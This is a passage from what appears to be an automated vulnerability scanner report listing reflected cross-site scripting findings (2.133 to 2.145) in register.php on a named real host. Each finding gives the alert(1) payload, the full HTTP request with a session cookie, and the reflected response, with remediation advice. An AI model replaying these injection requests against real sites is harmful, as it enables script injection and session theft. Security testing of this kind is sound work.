Date: Mon, 26 Sep 2011 21:05:53 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</favicon.icoe828e"-alert(1)-"514b277815b?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.133. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 59a1a%3balert(1)//6e0a6fe9b6c was submitted in the REST URL parameter 3. This input was echoed as 59a1a;alert(1)//6e0a6fe9b6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/favicon.ico59a1a%3balert(1)//6e0a6fe9b6c HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:09:18 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</favicon.ico59a1a;alert(1)//6e0a6fe9b6c?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.134. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 544de"><script>alert(1)</script>eab4d33622d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/544de"><script>alert(1)</script>eab4d33622d/images/ajaxStatus/loading.gif HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:00:28 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/544de"><script>alert(1)</script>eab4d33622d/images/ajaxStatus/loading.gif?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.135. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e00aa"-alert(1)-"54d51a680fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3Ce00aa"-alert(1)-"54d51a680fa/images/ajaxStatus/loading.gif HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:03:14 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<e00aa"-alert(1)-"54d51a680fa/images/ajaxStatus/loading.gif?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.136. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b928a%3balert(1)//69c58adbbe8 was submitted in the REST URL parameter 2. This input was echoed as b928a;alert(1)//69c58adbbe8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3Cb928a%3balert(1)//69c58adbbe8/images/ajaxStatus/loading.gif HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:11:07 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<b928a;alert(1)//69c58adbbe8/images/ajaxStatus/loading.gif?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.137. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 97a38%3balert(1)//b01b4a2a216 was submitted in the REST URL parameter 3. This input was echoed as 97a38;alert(1)//b01b4a2a216 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images97a38%3balert(1)//b01b4a2a216/ajaxStatus/loading.gif HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:15:02 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images97a38;alert(1)//b01b4a2a216/ajaxStatus/loading.gif?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.138. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77448"-alert(1)-"fe9f201249e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images77448"-alert(1)-"fe9f201249e/ajaxStatus/loading.gif HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:13:10 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images77448"-alert(1)-"fe9f201249e/ajaxStatus/loading.gif?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.139. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8de3d%3balert(1)//bc5f299fbd3 was submitted in the REST URL parameter 4. This input was echoed as 8de3d;alert(1)//bc5f299fbd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus8de3d%3balert(1)//bc5f299fbd3/loading.gif HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:21:36 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/ajaxStatus8de3d;alert(1)//bc5f299fbd3/loading.gif?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.140. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a29f7"-alert(1)-"d3848583dbb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatusa29f7"-alert(1)-"d3848583dbb/loading.gif HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:19:39 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/ajaxStatusa29f7"-alert(1)-"d3848583dbb/loading.gif?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.141. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b3252%3balert(1)//431aa355168 was submitted in the REST URL parameter 5. This input was echoed as b3252;alert(1)//431aa355168 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gifb3252%3balert(1)//431aa355168 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:26:04 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/ajaxStatus/loading.gifb3252;alert(1)//431aa355168?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.142. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34c1e"-alert(1)-"a34dfbbcdd6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif34c1e"-alert(1)-"a34dfbbcdd6 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:23:56 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/ajaxStatus/loading.gif34c1e"-alert(1)-"a34dfbbcdd6?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.143. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c481b%3balert(1)//ca8ab330bbe was submitted in the REST URL parameter 2. This input was echoed as c481b;alert(1)//ca8ab330bbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3Cc481b%3balert(1)//ca8ab330bbe/images/captcha.php HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:02:21 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<c481b;alert(1)//ca8ab330bbe/images/captcha.php?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.144. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d84e5"-alert(1)-"07bb3d4c9cb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3Cd84e5"-alert(1)-"07bb3d4c9cb/images/captcha.php HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:01:39 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<d84e5"-alert(1)-"07bb3d4c9cb/images/captcha.php?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.145. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php

Issue detail

